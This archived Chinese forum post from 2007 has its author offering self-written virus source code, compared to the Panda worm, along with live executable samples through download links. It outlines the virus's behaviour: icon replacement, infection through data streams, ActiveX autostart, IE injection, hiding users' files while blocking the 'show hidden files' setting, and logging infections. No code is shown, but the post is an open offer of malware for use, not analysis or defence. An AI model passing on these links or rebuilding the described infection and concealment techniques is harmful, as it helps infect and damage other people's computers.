燕郊网城论坛

东杉国际

苦命 发表于 2007-8-23 13:48

小浩病毒源代码

使用迅雷下载



自己写的一份病毒源代码(类似熊猫 VC)
[url=http://xiaohao.yona.biz/XiaoHao.rar]Http://xiaohao.yona.biz/XiaoHao.rar[/url]   ------- 此乃源代码

这种修改ico方式是 loadexe然后enumresource icon

[url=http://xiaohao.yona.biz/XiaoHaoCodeNew.rar]Http://xiaohao.yona.biz/XiaoHaoCodeNew.rar[/url]

这是直接交换数据流的方式感染 这份rar 增加了 avtivex自启动 与 ie注入 
xiaohao.yona.biz/xiahao.exe 这是样本


如果你对auto免疫 就下
xiaohao.yona.biz/Test1.exe 

除了exe     & 网页文件 一律隐藏...     并且导致用户 不能 "显示隐藏文件"

中后感染的记录都在c:\jilu.txt

大牛就表看;了...

Q Num: 82602935

Blog [url=http://hi.baidu.com/xh_hook]Http://Hi.baidu.com/xh_hook[/url]


Code:By 小浩 转载时请注明 不然木JJ

页: [1]

Powered by Discuz! Archiver Array  © 2007-2010 yanjiao.com